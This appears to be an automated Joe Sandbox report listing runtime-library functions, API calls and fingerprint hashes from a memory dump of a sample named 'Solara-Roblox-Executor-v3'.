Opcode ID: 3e140b5639bc40fe690e9242871d7fbaa6d84b963e9b0a16896540deb6cfbd2e
Instruction ID: 4464cd9d229cf2a3cbc32d1fb7c8f18f41061016bfe088ae67b7e54c98385665
Opcode Fuzzy Hash: 3e140b5639bc40fe690e9242871d7fbaa6d84b963e9b0a16896540deb6cfbd2e
Instruction Fuzzy Hash: CCF0683240111ABBCF136F91DC269DE3F2AEB497A0F058510BA1825064C736CA31AB91

Function 003056B7 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00309A64,?,00000000,?,?,00309704,?,00000007,?,?,0030A04A,?,?), ref: 003056CD
GetLastError.KERNEL32(?,?,00309A64,?,00000000,?,?,00309704,?,00000007,?,?,0030A04A,?,?), ref: 003056D8

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 5690615bb726f6cfc03a81ac56eb615da5eda314d0e45e214869a79d00945222
Instruction ID: bb85d68e2dc9e215e76999d03d235e313cd2d84309231986c194423e7d1f3bbf
Opcode Fuzzy Hash: 5690615bb726f6cfc03a81ac56eb615da5eda314d0e45e214869a79d00945222
Instruction Fuzzy Hash: C1E0C232102618BBCF232FA8EC0CBCA7B9CDF44B52F155060FA0C8A0E0CB328850CB94

Function 002F14C0 Relevance: 1.8, APIs: 1, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 002F150B

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 6dd1bad8b6ad8d7bf010c63a5eac92b0d2d6546e74b4cbdf1f6c53cbb4fa1403
Instruction ID: 180d66e4e508ac60214dec6b5049e25f50abfba7b7336fbc988b9f92c72c0c88
Opcode Fuzzy Hash: 6dd1bad8b6ad8d7bf010c63a5eac92b0d2d6546e74b4cbdf1f6c53cbb4fa1403
Instruction Fuzzy Hash: FFD10474624B48CFC724DF28C154A76FBE0BF48794B508A2DE98B8BB91D774E924CB41

Function 00307837 Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000083,?,00000005,003076B8,?), ref: 00307869

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 0c66cc733687d4abaecb9389fdc94296e1e437ed28c32766f67f435a7ff839a7
Instruction ID: db51d14b565ed507916cf7caa24b7c5f2de282a7c3d3d5d643fdf812fa059b4f
Opcode Fuzzy Hash: 0c66cc733687d4abaecb9389fdc94296e1e437ed28c32766f67f435a7ff839a7
Instruction Fuzzy Hash: 70514BB1D0A159AEDB128A28CD98BE9BBADEF15300F1441E9E599C71C2D331BD45CFA0

Function 002F8570 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 495baf2036b2db023e16e51de3eca66404309fd36d90ac66526cab89657b12ba
Instruction ID: 647183399d3418e81d6e6e1ce84b3d7752f712a54d95dfbbfb78a90e67fc4121
Opcode Fuzzy Hash: 495baf2036b2db023e16e51de3eca66404309fd36d90ac66526cab89657b12ba
Instruction Fuzzy Hash: C2414A32A2011EABCB14DF68C4909FEF7B9BF08350B544179E646E7640EB31E965DF90

Function 0030670D Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b941cb9c52b18cefaf0383c9f20598a30bbdc107185b00c7b0cfdf1cb81b5eb7
Instruction ID: 0b06d502ce3870441f6e57a96d8335a99a6be48d280a37edf223015ee61792f6
Opcode Fuzzy Hash: b941cb9c52b18cefaf0383c9f20598a30bbdc107185b00c7b0cfdf1cb81b5eb7
Instruction Fuzzy Hash: 8501F9336011149FDB178F6CEC9295633AEFBC4B64B254128F910870D8DB319C218BD0

Function 003056F1 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00307675,?,?,00307675,00000220,?,?,?), ref: 00305723

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9cd7682c64c69517ca9453387ec8031d321602c7c7b88cd474a31393945cf93a
Instruction ID: 16cdd4cf9f778a6f65865186c2f2faeb2b6895bca9561f9452684e19c6aac994
Opcode Fuzzy Hash: 9cd7682c64c69517ca9453387ec8031d321602c7c7b88cd474a31393945cf93a
Instruction Fuzzy Hash: 8CE09231203A25E6DB336A799C21B9F769CDF41FF0F164120FD059A4D0EB60CC01A9E5

Non-executed Functions

Function 00310502 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00310719

Strings

1#INF, xrefs: 00310638
1#IND, xrefs: 00310607
1#QNAN, xrefs: 00310615
1#SNAN, xrefs: 0031060E

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 4949033d566d2f369919aac3f32957324ad99ec0e16d57e41472946b63724312
Instruction ID: 53a7c34850cb0d090b82a8e9ea050951c58ee96ea077da726c5487a3f9e9c6e0
Opcode Fuzzy Hash: 4949033d566d2f369919aac3f32957324ad99ec0e16d57e41472946b63724312
Instruction Fuzzy Hash: 4ED23B71E082298FDB6ACE28DD407EAB7B9EB48305F1541EAD50DE7240DB74AEC58F41

Function 0030B1B7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0030AB6D,00000002,00000000,?,?,?,0030AB6D,?,00000000), ref: 0030B250
GetLocaleInfoW.KERNEL32(?,20001004,0030AB6D,00000002,00000000,?,?,?,0030AB6D,?,00000000), ref: 0030B279
GetACP.KERNEL32(?,?,0030AB6D,?,00000000), ref: 0030B28E

Strings

ACP, xrefs: 0030B1D5
OCP, xrefs: 0030B20B

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 5a24de6e143096b6eb4830321ade4b63f531cb6dd518be764b5923440ff6e6ea
Instruction ID: abcaf97f236f6d72d2a5043d4d062305fce9e4913a61c9d438fdd12d8d4a9a30
Opcode Fuzzy Hash: 5a24de6e143096b6eb4830321ade4b63f531cb6dd518be764b5923440ff6e6ea
Instruction Fuzzy Hash: BA21C532A02100AADB378F64C925B9FF3AEEF54F50B578824E90ADB294E732DD41C350

Function 0030AA37 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0030AB3F
IsValidCodePage.KERNEL32(00000000), ref: 0030AB7D
IsValidLocale.KERNEL32(?,00000001), ref: 0030AB90
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0030ABD8
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0030ABF3

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 3d2d6d29811e6dd5a2ef457e8a429424617a3065dde9c060e0c081771f644213
Instruction ID: 78f7f2b1c54494b9cc86126a0cf5c21d200e17ef3dc06c8e622420efaa23a78a
Opcode Fuzzy Hash: 3d2d6d29811e6dd5a2ef457e8a429424617a3065dde9c060e0c081771f644213
Instruction Fuzzy Hash: 27519471A027059FEB12DFA8EC55ABE73B9FF09700F064529E901EB1D0E7709940CB62

Function 00303440 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction ID: 781ac102b92681d1c59e79af2b9a988f987b3972b0fb4f9c7752eb7cbea5dee2
Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction Fuzzy Hash: 12025DB1E022199BDF15CFA9C8906AEFBF5FF48314F258269E515E7380D731AA45CB80

Function 0030B799 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0030B889

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 937d2504eabc46c278975641e44f67ea085bbc0e956d8451dc7e0538386f50c6
Instruction ID: cf24d8ac30b336bc370e792addcc6b196c9a7d920ebea12d0ea301eb76e1225b
Opcode Fuzzy Hash: 937d2504eabc46c278975641e44f67ea085bbc0e956d8451dc7e0538386f50c6
Instruction Fuzzy Hash: C271E47190615C5FDF22AF28CCA9AFAF7B8EF49300F1541D9E409A7291DB314E849F10

Function 002F9A73 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 002F9A7F
IsDebuggerPresent.KERNEL32 ref: 002F9B4B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002F9B64
UnhandledExceptionFilter.KERNEL32(?), ref: 002F9B6E

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 538e5e99ae8c940ea308202c186440ca882a03ee1086d5b766757a485f921c68
Instruction ID: df8069bf4fc76e0afe065c92a68902d7d536987cf68e06bfe3353b8ffba49f93
Opcode Fuzzy Hash: 538e5e99ae8c940ea308202c186440ca882a03ee1086d5b766757a485f921c68
Instruction Fuzzy Hash: 8D312575D0522D9BDB21EFA4D949BCDBBB8AF08340F1041EAE50CAB250EB719A848F45

Function 002FA335 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 002FA347
GetCurrentThreadId.KERNEL32 ref: 002FA356
GetCurrentProcessId.KERNEL32 ref: 002FA35F
QueryPerformanceCounter.KERNEL32(?), ref: 002FA36C

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 864ef621095526b30fc542de213b2752d9ae2d4c07069c4ff95e050c019cfacc
Instruction ID: 7f5d63be082fc715a90a5da0d52515c2fddb082c6a0e48f751318bcfd8494a74
Opcode Fuzzy Hash: 864ef621095526b30fc542de213b2752d9ae2d4c07069c4ff95e050c019cfacc
Instruction Fuzzy Hash: BCF05F75D1020DEBCB01EBB4DA899DEBBF8FF1C704B9189A5A812E6110E734AA449B51

Function 0030AD30 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0030AD84
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0030ADCE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0030AE94

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 871bc2807a093c7c566a695c5841a3f64ed428ab6eb6a16bd2ba876057b3e5ec
Instruction ID: ca878681a9636dea124c61da3c2fc5c350a59c48d50cadc2d11a8a390ac175b3
Opcode Fuzzy Hash: 871bc2807a093c7c566a695c5841a3f64ed428ab6eb6a16bd2ba876057b3e5ec
Instruction Fuzzy Hash: C961BEB1552A079FDB2A9F28ECA2BBAB3A8FF04300F114179ED05CA5C5E734D990CB51

Function 00301A60 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00301B58
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00301B62
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00301B6F

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e17ba023316ad1bfbd9090cd545fc74d6d38937efbc2f461839616b5cea3d6d7
Instruction ID: 062b785c80ec023513da5949deacdb9fbe3b80da50032d628b9c569b358e5530
Opcode Fuzzy Hash: e17ba023316ad1bfbd9090cd545fc74d6d38937efbc2f461839616b5cea3d6d7
Instruction Fuzzy Hash: 5E31D27491122C9BCB25DF68D988BDDBBB8BF08750F5041EAE80CA7291E7709B858F44

Function 0030EA8E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0030E9E9,?,?,00000008,?,?,0031539B,00000000), ref: 0030ECBB

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 9e08751a18baa8bcf2309ec13c893731df5a8b01892a5b2c39ef431b13492fa9
Instruction ID: ffbac1c4ff3be7085be3e17392616f4991cc0d5d0d0436d08c3b525810cde1ee
Opcode Fuzzy Hash: 9e08751a18baa8bcf2309ec13c893731df5a8b01892a5b2c39ef431b13492fa9
Instruction Fuzzy Hash: BAB14F31611609DFD71ACF28C496B657BE0FF45364F268A59E89ACF2E1C336E981CB40

Function 002F96DB Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 002F96F1

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 831bfe208fe61a6ff80888683ce696458c8eaad17d54b5c6f0179c058732c46e
Instruction ID: b563f04fbeca72328f2e52e807e6b25141c64b3a615420c29bd3f7367402bf01
Opcode Fuzzy Hash: 831bfe208fe61a6ff80888683ce696458c8eaad17d54b5c6f0179c058732c46e
Instruction Fuzzy Hash: 53A19BB19212098FDB2ACF54D8827AAFBF4FB48760F14853ED411E7261C3749985CF90

Function 0030B6E8 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003069F4: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00305B8F,00000001,00000364,00000002,000000FF,?,00000000,?,002FD655,00000000,?), ref: 00306A35

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0030B889
FindNextFileW.KERNEL32(00000000,?), ref: 0030B97D
FindClose.KERNEL32(00000000), ref: 0030B9BC
FindClose.KERNEL32(00000000), ref: 0030B9EF

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

